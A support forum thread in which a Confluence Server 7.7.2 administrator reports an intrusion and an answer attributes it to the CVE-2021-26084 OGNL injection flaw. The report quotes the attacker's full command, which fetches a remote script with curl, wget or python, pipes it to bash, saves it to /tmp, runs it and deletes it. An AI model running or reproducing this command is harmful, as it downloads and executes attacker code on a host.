Security issue

Dear Confluence Team,

We have just revealed a security issue on our Confluence server - someone was able to place the below command in the code:

(confluence1) CMD ((curl -fsSL http://bash.givemexyz.in/xms||wget -q -O- http://bash.givemexyz.in/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("http://bash.givemexyz.in/xms").read()')| bash -sh; lwp-download http://bash.givemexyz.in/xms /tmp/xms; bash /tmp/xms; /tmp/xms; rm -rf /tmp/xms)

Could you please advise what is the possible way this has been introduced?

The Confluence Server version we run is 7.7.2.

I would be grateful for a prompt response.

Kind regards,

Alicja Mostowik

1 answer

1 vote

Answer accepted

I can see your confluence version is affected by CVE-2021-26084 - Confluence Server Webwork OGNL injection vulnerability. Please find the mitigation steps mentioned in the link.

You must be a registered user to add a comment. If you've already registered, sign in. Otherwise, register and sign in.

Thank you!

You must be a registered user to add a comment. If you've already registered, sign in. Otherwise, register and sign in.

Like • Kishan Sharma likes this